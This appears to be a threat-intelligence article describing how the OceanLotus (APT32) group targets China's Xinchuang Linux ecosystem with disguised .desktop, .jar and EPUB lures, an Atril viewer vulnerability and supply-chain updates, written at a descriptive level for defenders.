OceanLotus, the moniker the security community uses for the Vietnamese–linked APT32 group, has quietly shifted gears. Their latest campaign is not aimed at the usual Windows‑centric targets; instead it focuses on Xinchuang, China’s ambitious “New Generation” technology ecosystem that promises full IT self‑reliance through domestically sourced hardware and software. The change is not accidental. As China tightens its grip on critical infrastructure, the attackers see an opportunity to infiltrate systems that have grown increasingly isolated from Western cloud services and open‑source ecosystems.
The Deceptive File‑Based Tactics that Blend Into the Environment
.desktop Files: Linux’s Shortcut with a Dark Side
In 2025, researchers documented a wave of spear‑phishing that used malicious attachments masquerading as official policy documents. One of the most insidious formats was the .desktop file, a Linux analog to the Windows .lnk shortcut. When a user double‑clicked these files, the embedded “Exec” line executed a payload that created scheduled tasks, giving the attackers a persistent foothold for command‑and‑control communication. The naming was deliberate: a file titled “Notice on Printing and Distributing the Minutes of the 2025 Meeting of the Energy Industry Shale Gas Standardization Technical Committee.pdf.desktop” looked like bureaucratic paperwork, but it was a Trojan horse.
.jar Files: Java, the Trusted Compromise Medium
Java remains ubiquitous in government and enterprise terminals, making .jar files an attractive vector. OceanLotus packaged malicious code inside innocuous filenames such as “The Path Dispute of the Asia‑Pacific Free Trade Area and China’s Plan.jar” or “Energy Supply and Demand Statement.xls.jar.” Once executed, these jars would probe the environment, verify that they were running on a legitimate system, and then download secondary payloads—often an installer named “report‑scheduler‑1.0‑SNAPSHOT.jar.” The attackers cleverly hid their real intent behind a veneer of legitimate business documents.
<h3.PDF Lures and Office Suites: The Remote‑Hosted Trap
The threat actors also exploited the local productivity stack by embedding malicious links in PDF files that opened WPS Office directly. Victims were lured into opening a document titled “Suggestions for Addressing International Maritime Disputes under the BBNJ Agreement,” which in turn fetched code from a remote server. By targeting the native office suite, the attackers bypassed many of the security controls that would be in place for more exotic file types.
Vulnerability Exploitation: CVE‑2023‑52076 and the Atril Document Viewer
Mid‑2025 saw a sharp pivot. OceanLotus leveraged CVE‑2023‑52076, a critical flaw in the Atril Document Viewer used by the MATE desktop environment. The attackers packaged the exploit in a malicious EPUB file called “Safety Office Inspection Work – Final Version.epub.” When opened, the code executed a hidden script that installed an autostart entry and an encrypted Python downloader. The result: silent persistence on victim machines, a classic example of turning a legitimate document viewer into a covert command channel.
Beyond Phishing: Compromising the Supply Chain
Brute‑Force Attacks on Internal Security Servers
Spear‑phishing was just the opening act. Once inside, OceanLotus intensified their efforts by attempting brute‑force intrusions against internal security servers—a move that echoes the tactics seen in the LockBit supply‑chain attacks. The attackers conducted a month‑long reconnaissance phase, gathering credentials and mapping the network. After identifying an unknown vulnerability, they pushed malicious updates to both Xinchuang innovation systems and Windows terminals. This dual‑platform approach indicates a strategic intent to spread infiltration across the entire ecosystem, not just a single stack.
A Shift from Windows to Linux‑Centric Operations
Historically, OceanLotus has focused on Windows environments, exploiting familiar weaknesses such as unpatched SMB services or poorly configured Active Directory. The move toward Linux‑based, domestically curated ecosystems marks a significant evolution. It suggests that the threat actor is learning to thrive in environments where the usual defensive tools may be limited or absent. By embedding themselves in the very fabric of Xinchuang, they gain a foothold that is harder for external security firms to detect and remediate.
What Lies Ahead for China’s Self‑Reliant Tech Ecosystem?
As the attackers deepen their presence in Xinchuang, defenders face a new reality: the tools they rely on for detection are also the tools they might be compromised by. The future of security in this context will hinge on proactive threat hunting, zero‑trust architectures, and continuous monitoring of file integrity across both Windows and Linux systems. The broader lesson is clear—when a threat actor can embed itself in the operational backbone of a nation’s technology strategy, the stakes rise dramatically. The next wave of cyber‑defense will need to anticipate not just external attacks but also internal supply‑chain compromises that blur the line between legitimate updates and malicious code.
